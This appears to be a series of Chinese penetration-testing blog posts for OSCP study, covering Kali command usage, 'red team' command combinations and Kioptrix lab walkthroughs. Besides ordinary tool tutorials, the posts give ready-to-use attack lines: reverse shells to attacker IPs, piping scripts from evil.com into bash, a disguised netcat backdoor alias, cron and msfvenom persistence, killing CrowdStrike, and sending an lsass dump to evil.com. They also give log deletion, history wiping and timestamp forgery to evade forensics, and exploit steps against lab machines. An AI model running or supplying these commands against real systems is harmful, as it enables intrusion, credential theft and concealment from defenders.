此时可正常操作交互式 Shell。

结论：

Netcat 无法直接与未加密的 EXEC 型 Bind Shell 兼容，需使用 socat 或调整参数（如添加 pty）。

常见错误与修复

• 问题：cmd.exe 未执行，提示权限或参数错误。
• 修复：

添加 pipes 参数处理输入输出流（如 EXEC:cmd.exe,pipes）。
使用 pty 分配虚拟终端（如 EXEC:cmd.exe,pty）。
检查防火墙是否放行端口。

总结

• 加密传输与 Shell：必须使用 SSL 证书，否则无法通信。
• Netcat 兼容性：仅适用于简单 TCP 连接，复杂交互需依赖 socat。
• 参数调整：EXEC 需配合 pipes 或 pty 处理 Shell 交互。

以上步骤基于 Kali 2025.1a 和 Windows 10/11 环境验证。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day7 Kali文本编辑、比较不同、监控、下载、历史命令

Thu, 10 Apr 2025 23:20:31 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。

文本编辑器

在Kali Linux中，文本编辑器是渗透测试和系统配置的核心工具。

一、Nano编辑器：轻量级快速操作

1. 基础操作

• 文件操作
• 新建/打开文件：nano 文件名（支持路径跳转）
• 保存文件：Ctrl+O → 回车确认文件名
• 退出：Ctrl+X（未保存时会提示）

• 文本编辑
• 剪切行：Ctrl+K
• 粘贴：Ctrl+U
• 搜索：Ctrl+W → 输入关键词，Alt+W跳转下一个匹配项

2. 渗透向高级技巧

• 快速执行系统命令
在编辑界面按Ctrl+T，可直接执行Shell命令（如生成Payload或测试网络连接）。

• 修改敏感文件提权
例如通过sudo nano /etc/passwd添加UID=0的用户（需root权限）：

1testuser:x:0:0::/root:/bin/bash

• 配置文件篡改
使用nano快速编辑SSH配置（/etc/ssh/sshd_config）或Web服务日志路径，隐藏攻击痕迹。

3. 效率优化配置

• 启用语法高亮 & 行号
修改~/.nanorc，添加：

1include "/usr/share/nano/*.nanorc" # 语法高亮
2set linenumbers # 显示行号
3set mouse # 支持鼠标操作

二、Vi/Vim编辑器：渗透测试的瑞士军刀

1. 模式切换与基本操作

• 模式切换
• 命令模式 → 插入模式：i（光标前插入）、a（光标后插入）
• 返回命令模式：Esc

• 渗透常用操作
• 批量替换：:%s/old/new/g（替换文件内所有匹配项）
• 快速跳转：:行号（如:100跳至第100行）
• 执行外部命令：:!命令（如:!nmap 192.168.1.1扫描目标）

2. 渗透实战场景

• 日志分析与篡改
使用vim打开日志文件（如/var/log/auth.log），通过/Failed password快速定位爆破尝试记录并删除。

• 提权漏洞利用
编辑SUID文件或Cron任务脚本，插入反向Shell代码：

1bash -i >& /dev/tcp/攻击机IP/端口 0>&1

• 多文件协同编辑
在渗透测试中同时操作多个配置文件，用:e 文件名切换文件，:sp分屏查看。

3. 高级功能配置

• 启用行号与搜索高亮
在~/.vimrc中添加：

1set number " 显示行号
2set hlsearch " 高亮搜索结果
3syntax on " 语法高亮

三、命令速查表（渗透向）

四、注意事项

权限管理：渗透测试中编辑系统文件需配合sudo，避免因权限不足中断操作。
备份机制：使用nano -B或:w 备份文件名保留原始文件，防止误操作。
日志清理：通过编辑器删除日志后，需清除文件时间戳（touch -r）以规避检测。

通过灵活运用这些技巧，你可以显著提升在Kali Linux中的渗透测试效率。如需更完整的命令列表，可参考man nano或vimtutor。

比较不同的方法和命令

1. 下载并解压扫描文件

1# 下载文件
2wget https://offensive-security.com/pwk-files/scans.tar.gz
3
4# 解压到当前目录
5tar -xzvf scans.tar.gz
6
7# 进入解压后的目录
8cd scans

2. 确认需要对比的文件

3. 使用 `diff` 对比差异

 1# 基本对比（显示不同行的内容）
 2diff 10.11.1.8_scan_01.txt 10.11.1.8_scan_02.txt 
 3
 4# 生成统一格式的差异报告（更易读）
 5 diff -u 10.11.1.8_scan_01.txt 10.11.1.8_scan_02.txt > diff_report.txt
 6
 7# 仅关注关键信息（如开放的端口）
 8grep "open" 10.11.1.8_scan_01.txt > 10.11.1.8_scan_01_open.txt
 9grep "open" 10.11.1.8_scan_02.txt > 10.11.1.8_scan_02_open.txt 
10diff -u 10.11.1.8_scan_01_open.txt 10.11.1.8_scan_02_open.txt

4. 使用 `comm` 对比独有/共有行

 1# 先排序文件（comm要求输入已排序）
 2sort scan_old.txt > scan_old_sorted.txt
 3sort scan_new.txt > scan_new_sorted.txt
 4
 5# 对比文件（显示scan_old独有、scan_new独有、共有行）
 6comm s1.txt s2.txt 
 7
 8# 仅显示新增内容（s2独有）
 9comm -13 s1.txt s2.txt
10
11# 仅显示删除内容（s1独有）
12comm -23 s1.txt s2.txt

5. 使用 `vimdiff` 可视化对比

1# 启动vimdiff并排对比
2vimdiff scan_old.txt scan_new.txt

操作指南：

导航差异点： • ]c：跳转到下一个差异位置。 • [c：跳转到上一个差异位置。
合并更改（可选）： • do：将右侧内容应用到左侧（Diff Obtain）。 • dp：将左侧内容应用到右侧（Diff Put）。
退出： • :qa：退出所有窗口。

6. 实战技巧（渗透测试关注点）

• 端口变化：

1# 提取新旧开放的端口列表
2grep "open" scan_old.txt | awk '{print $1}' > ports_old.txt
3grep "open" scan_new.txt | awk '{print $1}' > ports_new.txt
4comm -13 ports_old.txt ports_new.txt # 新增端口
5comm -23 ports_old.txt ports_new.txt # 关闭端口

• 服务版本变化：

1# 对比SSH服务版本
2grep "ssh" scan_old.txt | awk '{print $4,$5}'
3grep "ssh" scan_new.txt | awk '{print $4,$5}'

速查表

工具	命令示例	用途
`diff`	`diff -u file1 file2`	生成行级差异报告
`comm`	`comm -12 sorted1 sorted2`	显示共有行
`vimdiff`	`vimdiff file1 file2`	可视化交互式对比
`grep`	`grep "open" file`	过滤关键信息
`sort`	`sort file > sorted_file`	排序文件以适配`comm`

通过以上步骤，您可以高效分析扫描结果的差异，并快速定位目标系统的配置变化。

以下是 Kali Linux 中渗透测试常用命令的 高频用法解析 和 实战场景速查，覆盖 tail、watch、wget、curl、axel、history、alias：

监控命令

1. `tail`：实时追踪文件变化

渗透核心用途：

• 监控日志（如攻击痕迹、服务状态） • 追踪漏洞利用输出

常用参数：

1tail -f /var/log/apache2/access.log # 实时跟踪文件末尾（-f）
2tail -n 50 /var/log/auth.log # 显示最后50行（-n）
3tail --pid=进程ID -f file.log # 跟踪文件直到进程结束

实战场景：

1# 实时观察 SSH 登录尝试（检测爆破行为）
2tail -f /var/log/auth.log | grep "Failed password"

2. `watch`：周期性执行命令并监控

渗透核心用途：

• 持续监控网络连接、进程状态 • 观察目标服务变化

常用参数：

1watch -n 2 "netstat -antup | grep ESTAB" # 每2秒刷新（-n）
2watch -d "ps aux | grep metasploit" # 高亮变化部分（-d）

实战场景：

1# 监控目标端口开放状态（检测防火墙规则变化）
2watch -n 5 "nmap -p 80,443 192.168.1.100"

下载命令

1. `wget`：非交互式文件下载

渗透核心用途：

• 下载漏洞利用代码、字典文件 • 镜像目标网站

常用参数：

1wget http://example.com/exploit.py -O /tmp/exp.py # 指定保存路径（-O）
2wget --user=admin --password=p@sswd http://intranet/backup.zip # 带认证下载
3wget -r -l 2 --no-parent http://target.com/ # 递归下载目录（-r）

实战场景：

1# 下载并直接执行远程脚本（高风险操作！）
2wget -qO- http://attacker.com/shell.sh | bash

2. `curl`：高级HTTP请求工具

渗透核心用途：

• 测试API端点 • 上传/下载Webshell • 绕过WAF检测

常用参数：

1curl -X POST -d "cmd=id" http://target.com/cmd.php # 发送POST请求（-X, -d）
2curl -H "User-Agent: Mozilla" http://target.com # 自定义请求头（-H）
3curl -o output.html http://target.com # 保存响应内容（-o）
4curl -k https://self-signed-cert.com # 忽略SSL证书错误（-k）

实战场景：

1# 快速检测SQL注入漏洞（时间盲注）
2curl -s "http://target.com/?id=1' AND SLEEP(5)--" -o /dev/null -w "Time: %{time_total}s"

3. `axel`：多线程加速下载

渗透核心用途：

• 快速下载大文件（如字典、镜像） • 绕过下载限速

常用参数：

1axel -n 10 http://mirror.kali.org/kali.iso # 启用10线程下载（-n）
2axel -a -S https://mirrors.aliyun.com/kali # 自动选择镜像源（-S）

实战场景：

1# 多线程下载字典文件（提升效率）
2axel -n 8 http://wordlists.secploit.com/rockyou.txt.gz

历史记录和别名设置

1. `history`：管理命令行历史

渗透核心用途：

• 回溯攻击操作 • 清理痕迹

常用参数：

1history # 显示全部历史命令
2history | grep "nmap" # 过滤特定命令
3history -c # 清空当前会话历史（-c）
4!100 # 执行历史记录中第100条命令

实战场景：

1# 快速调用历史中的漏洞扫描命令
2!ssh # 执行最后一次ssh命令
3!! # 重复上一条命令

2. `alias`：自定义命令别名

渗透核心用途：

• 简化复杂命令 • 隐藏恶意操作

常用配置：

1alias l='ls -lah' # 简化文件列表
2alias scan='nmap -sV -Pn -T4' # 快速扫描模板
3alias http-server='python3 -m http.server' # 一键启动HTTP服务

实战场景：

1# 创建隐蔽后门别名（持久化需写入 ~/.bashrc）
2alias innocent='echo "Hello" && nc -e /bin/sh 192.168.1.100 4444'

渗透命令速查表

注意事项

日志清理：使用 history -d 或 shred -zu ~/.bash_history 清除敏感操作记录。
隐蔽下载：通过 curl 的 --socks5 参数或 proxychains 代理下载，避免暴露真实IP。
别名持久化：将常用别名写入 ~/.bashrc 或 /etc/profile，重启后仍生效。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day6 Kali常用命令

Tue, 08 Apr 2025 11:34:14 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。

红队渗透测试常用命令的典型场景和用法

2025年4月7日 23点46分

Day2中简单列举了几个Shell基本命令作为练习，本节将列举这些常见命令的红队渗透（也包含防御场景）常用组合方法。

从官方下载log文件练习，这是官方为了配合课程给我们提供的课后练习，日志文件

1wget www.offensive-security.com/pwk-files/access_log.txt.gz
2gunzip access_log.txt.gz

1. `grep` - 快速过滤敏感信息

1# 从日志中提取登录失败记录（爆破检测）
2cat /var/log/auth.log | grep "Failed password"
3
4# 搜索配置文件中的密码字段（敏感信息提取）
5grep -r "password" /etc/ 2>/dev/null
6
7# 过滤含特定关键词的HTTP请求（如SQL注入特征）
8cat access.log | grep "select.*from"

2. `sed` - 动态修改文件内容

1# 删除日志中本机IP痕迹（反取证）
2sed -i '/192.168.1.100/d' /var/log/nginx/access.log
3
4# 替换webshell中的恶意特征码（绕过WAF）
5sed -i 's/eval($_POST/process_data(/g' backdoor.php

3. `cut` - 提取关键数据列

 1# 提取/etc/passwd中的用户名列表
 2cut -d: -f1 /etc/passwd
 3
 4# 从CSV中提取子域名（信息收集）
 5cat targets.csv | cut -d',' -f3 | grep ".*\.example\.com"
 6
 7# 提取ip
 8cat access_log.txt | cut -d " " -f 1 | sort -u
 9
10# 看访问数量
11cat access_log.txt | cut -d " " -f 1 |sort | uniq -c
12# 从多到少排序
13cat access_log.txt | cut -d " " -f 1 |sort | uniq -c |sort -run
14# 筛查最高请求的攻击源是否攻击成功
15cat access_log.txt| grep '208.68.234.99' | grep admin | uniq -c

4. `awk` - 高级文本分析与提取

1# 统计访问日志中的高频IP（寻找攻击源）
2awk '{print $1}' access.log | sort | uniq -c | sort -nr
3
4# 提取HTTP响应码为200的请求（漏洞扫描）
5cat access.log | awk '$9 == 200 {print $7}'

5. `comm` - 对比敏感文件差异

1# 对比用户列表变化（检测后门账户）
2comm -3 <(sort /etc/passwd) <(sort passwd.bak)

6. `diff` / `vimdiff` - 分析配置变更

1# 对比系统文件是否被篡改（如sshd_config）
2diff /etc/ssh/sshd_config /backup/sshd_config_original
3
4# 可视化对比两个版本Web代码（查找Webshell）
5vimdiff index.php index.php.bak

7. `ping` - 快速存活检测

1# 检测内网存活主机（C段探测）
2for i in {1..254}; do ping -c1 192.168.1.$i | grep "bytes from" & done

8. `wget` / `curl` - 隐蔽传输文件

1# 下载远程Payload并静默执行（无交互）
2curl -s http://evil.com/shell.elf | bash
3
4# 伪装User-Agent下载工具（绕过WAF）
5wget -U "Mozilla/5.0" http://evil.com/nc.exe

9. `axel` - 多线程加速下载

1# 快速拖取大型数据库备份文件（数据窃取）
2axel -n 10 http://target.com/database.tar.gz

10. `ps` / `kill` - 进程管理

1# 查找并杀死防护进程（如AV）
2ps aux | grep "crowdstrike" | awk '{print $2}' | xargs kill -9
3
4# 隐藏进程名启动反向Shell（避免ps暴露）
5cp /bin/bash /tmp/.httpd && /tmp/.httpd -c "/bin/bash -i >& /dev/tcp/1.1.1.1/443 0>&1"

11. `tail` / `watch` - 实时监控日志

1# 动态观察Apache错误日志（检测攻击触发情况）
2tail -f /var/log/apache2/error.log | grep "PHP Warning"
3
4# 监控新建立的网络连接（反溯源）
5watch -n 1 "netstat -antup | grep ESTABLISHED"

12. `history` / `alias` - 隐藏操作痕迹

1# 禁用历史记录（避免命令泄露）
2unset HISTFILE; export HISTFILESIZE=0
3
4# 创建高危命令别名（如快速清理日志）
5alias cleanlogs='find /var/log -type f -exec shred -u {} \;'

13. `jobs` / `fg` - 后台任务管理

1# 后台运行端口扫描工具（如masscan）
2masscan -p1-65535 10.0.0.0/24 > results.txt &
3jobs # 查看后台任务
4fg 1 # 调回前台继续操作

红队关键技巧

混淆命令：使用base64编码命令避免敏感字符串直接出现：
```
1echo "bHM=" | base64 -d | bash # 执行"ls"
```
时间戳伪造：用touch -t修改文件时间戳躲避时间轴分析。
管道符绕过：利用|、&&等符号组合命令绕过基础检测。

2025年4月7日 23点52分

进阶用法（后面会详细讲）

2025年4月8日 10点22分

以下是在渗透测试和溯源场景中，Kali Linux常用的命令组合与技巧，结合隐蔽性和实战需求整理成五大核心场景：

1. 信息收集与资产探测组合

命令工具：nmap + grep + cut
用途：快速扫描目标网络并提取关键信息

1# 扫描C段存活主机，提取开放80/443端口的IP
2nmap -sn 192.168.1.0/24 | grep "Nmap scan report" | cut -d' ' -f5 > live_hosts.txt
3nmap -p80,443 -iL live_hosts.txt -oX scan_results.xml
4
5# 解析XML扫描结果，提取高危服务（如SSH、RDP）
6grep -E 'portid="22"|portid="3389"' scan_results.xml | awk -F'\"' '{print $2":"$4}'

关键点：
• 使用-sn参数避免触发端口扫描告警
• 结果输出为XML格式便于后续自动化处理

2. Web漏洞利用组合

命令工具：nikto + sqlmap + curl
用途：自动化探测Web漏洞并验证利用

1# 扫描目标网站漏洞
2nikto -h http://target.com -output vuln_report.html
3
4# 检测SQL注入并自动化获取数据库信息
5sqlmap -u "http://target.com/index.php?id=1" --batch --dbs
6
7# 利用漏洞上传Webshell（需结合编码绕过）
8curl -X POST http://target.com/upload.php -F "file=@revshell.php" -H "User-Agent: Mozilla/5.0"

隐蔽技巧：
• 在sqlmap中添加--random-agent伪装浏览器流量
• 使用base64编码Webshell内容绕过基础WAF检测

3. 权限维持与后门部署组合

命令工具：msfvenom + systemctl + crontab
用途：生成隐蔽后门并实现持久化

1# 生成加密的Linux反向Shell Payload
2msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 -f elf -o httpd --encrypt xor
3
4# 部署后门并伪装为系统服务
5mv httpd /usr/sbin/.httpd && chmod +x /usr/sbin/.httpd
6systemctl enable apache2.service --now # 利用合法服务掩护
7
8# 添加定时任务维持权限（每小时连接一次）
9(crontab -l 2>/dev/null; echo "0 * * * * /usr/sbin/.httpd") | crontab -

隐蔽技巧：
• 使用systemctl修改服务描述字段掩盖恶意进程
• 定时任务文件路径伪装为/etc/cron.daily/logrotate

4. 日志清理与反溯源组合

命令工具：sed + find + shred
用途：擦除攻击痕迹并干扰时间线分析

1# 删除SSH登录失败记录
2sed -i '/Failed password/d' /var/log/auth.log
3
4# 批量清除Web访问日志中本机IP
5find /var/log/nginx/ -name "access.log*" -exec sed -i '/192.168.1.100/d' {} \;
6
7# 物理删除临时文件（覆盖7次后销毁）
8find /tmp/ -name "*.php" -exec shred -u -z -n7 {} \;

关键点：
• 优先操作日志轮转文件（如auth.log.1）
• 使用shred代替rm彻底破坏文件恢复可能性

5. 内网横向移动组合

命令工具：impacket-psexec + proxychains + smbmap
用途：通过凭证重用突破内网边界

1# 扫描内网SMB共享资源
2proxychains smbmap -H 10.0.0.5 -u 'admin' -p 'P@ssw0rd'
3
4# 利用PsExec执行远程命令（如抓取内存密码）
5proxychains impacket-psexec admin:'P@ssw0rd'@10.0.0.5 "cmd /c rundll32.exe C:\windows\system32\comsvcs.dll MiniDump 648 C:\lsass.dmp full"
6
7# 通过加密通道回传敏感数据
8curl --socks5 127.0.0.1:9050 -F "file=@lsass.dmp" https://evil.com/upload

隐蔽技巧：
• 使用DNS-over-HTTPS（DoH）隐藏C2通信
• 内存加载恶意代码避免磁盘文件写入（如Meterpreter的reflectivedllinject）

红队高阶技巧

流量伪装：

1# 使用合法云服务API传输数据（如AWS S3）
2aws s3 cp /etc/passwd s3://bucket-backdoor/ --profile=legit_user

容器逃逸：

1# 检测Docker环境并挂载宿主机目录
2findmnt | grep "/var/lib/docker" && docker run -v /:/mnt/host alpine chroot /mnt/host

硬件级隐蔽：

1# 修改网卡MAC地址绕过IP封锁
2ip link set dev eth0 down && macchanger -r eth0 && ip link set dev eth0 up

防御对抗建议

• 日志监控：关注/var/log/下auth.log、syslog的异常进程创建事件
• 进程防护：使用ps -auxf检查父进程异常的/usr/sbin/.httpd类服务
• 网络隔离：通过iptables限制非授权出站流量（如阻断TOR节点连接）

2025年4月8日 11点24分

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Kioptrix系列1-5

Wed, 26 Feb 2025 16:53:47 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Kioptrix: Level 1 (#1)

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Nmap扫描

输入ifconfig查看kali本机的网段。

输入 nmap -sn kali的ip/24探查网段，实战过程是通过vpn链接，进去后能查看网段。或 nmap -p- kali的ip/24探查所有网段。

可以发现129有一个80端口，在kali浏览器中访问可以看到如下界面：

接下来探查端口指纹

1 nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al

然后用漏洞扫描

1nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln

得到输出

 1┌──(kali㉿kali)-[~]
 2└─$ nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
 3Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:14 EST
 4Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
 5NSE Timing: About 0.00% done
 6Nmap scan report for 192.168.139.129
 7Host is up (0.00025s latency).
 8
 9PORT STATE SERVICE
 1022/tcp open ssh
 1180/tcp open http
 12|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 13|_http-csrf: Couldn't find any CSRF vulnerabilities.
 14|_http-dombased-xss: Couldn't find any DOM based XSS.
 15|_http-trace: TRACE is enabled
 16| http-enum:
 17| /test.php: Test page
 18| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
 19| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
 20|_ /usage/: Potentially interesting folder
 21111/tcp open rpcbind
 22139/tcp open netbios-ssn
 23443/tcp open https
 24|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
 25| ssl-poodle:
 26| VULNERABLE:
 27| SSL POODLE information leak
 28| State: VULNERABLE
 29| IDs: CVE:CVE-2014-3566 BID:70574
 30| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
 31| products, uses nondeterministic CBC padding, which makes it easier
 32| for man-in-the-middle attackers to obtain cleartext data via a
 33| padding-oracle attack, aka the "POODLE" issue.
 34| Disclosure date: 2014-10-14
 35| Check results:
 36| TLS_RSA_WITH_3DES_EDE_CBC_SHA
 37| References:
 38| https://www.imperialviolet.org/2014/10/14/poodle.html
 39| https://www.openssl.org/~bodo/ssl-poodle.pdf
 40| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
 41|_ https://www.securityfocus.com/bid/70574
 42|_http-csrf: Couldn't find any CSRF vulnerabilities.
 43| ssl-dh-params:
 44| VULNERABLE:
 45| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
 46| State: VULNERABLE
 47| IDs: CVE:CVE-2015-4000 BID:74733
 48| The Transport Layer Security (TLS) protocol contains a flaw that is
 49| triggered when handling Diffie-Hellman key exchanges defined with
 50| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
 51| to downgrade the security of a TLS session to 512-bit export-grade
 52| cryptography, which is significantly weaker, allowing the attacker
 53| to more easily break the encryption and monitor or tamper with
 54| the encrypted stream.
 55| Disclosure date: 2015-5-19
 56| Check results:
 57| EXPORT-GRADE DH GROUP 1
 58| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
 59| Modulus Type: Safe prime
 60| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
 61| Modulus Length: 512
 62| Generator Length: 8
 63| Public Key Length: 512
 64| References:
 65| https://www.securityfocus.com/bid/74733
 66| https://weakdh.org
 67| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
 68|
 69| Diffie-Hellman Key Exchange Insufficient Group Strength
 70| State: VULNERABLE
 71| Transport Layer Security (TLS) services that use Diffie-Hellman groups
 72| of insufficient strength, especially those using one of a few commonly
 73| shared groups, may be susceptible to passive eavesdropping attacks.
 74| Check results:
 75| WEAK DH GROUP 1
 76| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
 77| Modulus Type: Safe prime
 78| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
 79| Modulus Length: 1024
 80| Generator Length: 8
 81| Public Key Length: 1024
 82| References:
 83|_ https://weakdh.org
 84|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 85| ssl-ccs-injection:
 86| VULNERABLE:
 87| SSL/TLS MITM vulnerability (CCS Injection)
 88| State: VULNERABLE
 89| Risk factor: High
 90| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
 91| does not properly restrict processing of ChangeCipherSpec messages,
 92| which allows man-in-the-middle attackers to trigger use of a zero
 93| length master key in certain OpenSSL-to-OpenSSL communications, and
 94| consequently hijack sessions or obtain sensitive information, via
 95| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
 96|
 97| References:
 98| http://www.cvedetails.com/cve/2014-0224
 99| http://www.openssl.org/news/secadv_20140605.txt
100|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
101|_http-dombased-xss: Couldn't find any DOM based XSS.
102|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
1031024/tcp open kdm
104MAC Address: 00:0C:29:3B:F8:BB (VMware)
105
106Host script results:
107|_smb-vuln-ms10-054: false
108| smb-vuln-cve2009-3103:
109| VULNERABLE:
110| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
111| State: VULNERABLE
112| IDs: CVE:CVE-2009-3103
113| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
114| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
115| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
116| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
117| aka "SMBv2 Negotiation Vulnerability."
118|
119| Disclosure date: 2009-09-08
120| References:
121| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
122|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
123|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
124|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
125
126Nmap done: 1 IP address (1 host up) scanned in 333.53 seconds

目录扫描

从Nmap扫描的结果来看，它提示以下几个文件目录，可能有洞。

使用如下命令扫描目录

1dirb http://192.168.139.129/

看一圈泄露的目录后发现mod_ssl目录下似乎提示此漏洞可利用（靶机会这样提示，实战要自己猜自己挖）。且从之前的Nmap扫描结果中看出，SSL存在漏洞。

SSL漏洞利用 80/443端口

Kali终端中输入以下命令，查找可用的攻击方式。

1searchsploit mod_ssl

根据之前Nmap扫描的版本信息选择对应的攻击方式。可用的几个方式都试一遍。下载攻击方式，如果下载文件有损坏，可以到 https://www.exploit-db.com/ 网站下载对应源码。

1searchsploit -m 47080.c
2sudo apt-get install libssl-dev # 安装依赖环境
3gcc -o ssl47080 47080.c -lcrypto # 编译源码

1 ./ssl47080 |grep "1.3.20"

筛选符合 Apache 1.3.20版本的工具

靶机系统是RedHat，所以使用0x6a或0x6b。

0x6a测试失败，改用0x6b，输入以下命令：

1./ssl47080 0x6b 192.168.139.129 -c 40

提权为root

目前是使用apache账户登录shell，这个账户是用于apache服务的专用账户，可以使用ls /bin查看目前账户可以使用的命令，可以发现只能使用一些基本命令，权限较低，我们想要完整的shell就要root账户，就要提权。

现在本地攻击机下面下载提权脚本。

1wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

然后开启一个简单的http服务，提供给靶机用于下载提权脚本。

1sudo python -m http.server 80

这个靶机好在可以使用wget命令下载提权脚本。如果wget用不了的情况，可以尝试用curl或ftp下载脚本。然后从之前47080进去的Apache账户的shell里运行以下命令：

1wget http://192.168.139.128/ptrace-kmod.c

退出，然后再次重连，自动编译，就会获得root权限。如果重连后不是root，可以多试几次，或者更换47080.c文件。

另一种提权的方式：

（CVE-2003-0651）Apache RCE

https://www.cnblogs.com/wsec/p/vulnhub0x01.html#3cve-2003-0651apache-rce

这个67.c文件最好从网站下载，kali里下载的不全。尾号305的才是正确的文件。

但是编译不出来。

Samba 漏洞利用139端口

https://medium.com/@MarkdeMoras/kioptrix-level-1-1-vulnhub-walkthrough-by-mark-de-moras-147002cc4853

除了ssl漏洞，可以从之前的Nmap扫描结果发现也存在Samba漏洞。

使用Nmap再次扫描靶机的网址。

1 nmap -A -p- -T4 192.168.139.129

使用msf工具箱

1msfconsole
2search scanner/smb
3use 16
4info
5set RHOST 192.168.139.129

这样就获取了samba的版本，退出msf，然后搜索samba的攻击方式，选择对应版本。下载，编译。

1searchsploit samba 2.2.1a
2searchsploit -m multiple/remote/10.c
3gcc -o Samba 10.c

查看使用方式

使用如下命令爆破进入，直接获得root权限。

1./Samba -b 0 192.168.139.129

Samba缓存漏洞利用139端口

搜索通用版本的samba攻击方式，发现，还有例如“call_trans2open”远程缓冲区溢出（2）漏洞利用的方式。下载编译后查看使用方式。

rpcbind 尝试

漏洞扫描的结果中还有111端口和1024端口的rpcbind服务，搜索了有如下方法，但是尝试失败。

https://www.cnblogs.com/KUANTECH/p/17941528

上面这篇文章也做过了尝试是失败的，所以rpc的漏洞就不尝试了。

Kioptrix: Level 1.1 (#2)

2025年2月8日 14点15分

在攻击机上输入ifconfig查看本机网段。

1nmap -sP 192.168.139.0/24 -T5

扫描网段，发现130网段，是靶机，本机是128，254是网关，1，2都是网关。打开网页看一下，推测是sql注入。

1nmap -sS -T5 192.168.139.130 -A
2nmap -sS -T5 192.168.139.130 -p-

扫描靶机的端口。

sql万能密码都试一遍。以下两个都可以

admin' and 1=1 -- +
admin' -- +

网页提示让我们ping机器，但是没有ping的地方。dirb http://192.168.139.130/ 扫描目录发现一个没啥用的manual页面，先放着

查看网页源码发现有括号没有闭合。

复制后粘贴修改源码，把括号闭合。

出现ping框。

输入执行whoami的测试语句，能看到执行了whoami的语句。

然后构造一个反弹shell的语句用来链接shell。到网站 https://www.ddosi.org/shell/ 可以快速构造反弹语句。

1nc -lvnp 9001

在攻击机输入监听命令启动监听。

在浏览器submit处的127.0.0.1 && 后面拼接反弹命令得到

1127.0.0.1 && /bin/bash -i >& /dev/tcp/192.168.139.128/9001 0>&1

成功回弹获得bash权限，接下来是提权为root账户。执行uname 和lsb_release -a发现版本号，搜索相关poc。

从核心版本号2.6.9选择9542.c这个poc。

searchsploit -m 9542.c

攻击机开启http服务，上传poc到靶机。

python -m http.server

cd /tmp
wget http://192.168.139.128:8000/9542.c

编译执行，提权成功。

1gcc -o exp 9542.c
2./exp
3whoami

2025年2月8日 14点55分

Kioptrix: Level 1.2 (#3)

开启靶机后，在攻击机扫描网段。以下命令多开终端同步扫。

1nmap -sP 192.168.139.0/24 -T5
2nmap -sS -T5 192.168.139.131 -p-
3nmap -sS 192.168.139.131 -p- --min-rate 1000 -A
4dirb http://192.168.139.131/

访问80端口看到网页，点了一圈没有发现。

目录扫描发现php管理员登录入口。

发现登录界面，用万能密码，只填用户名，密码部分留空。

root" and 1=1 -- +

点击表，点击搜索，发现安全设置有问题，可以写文件。

show global variables like "secure%";

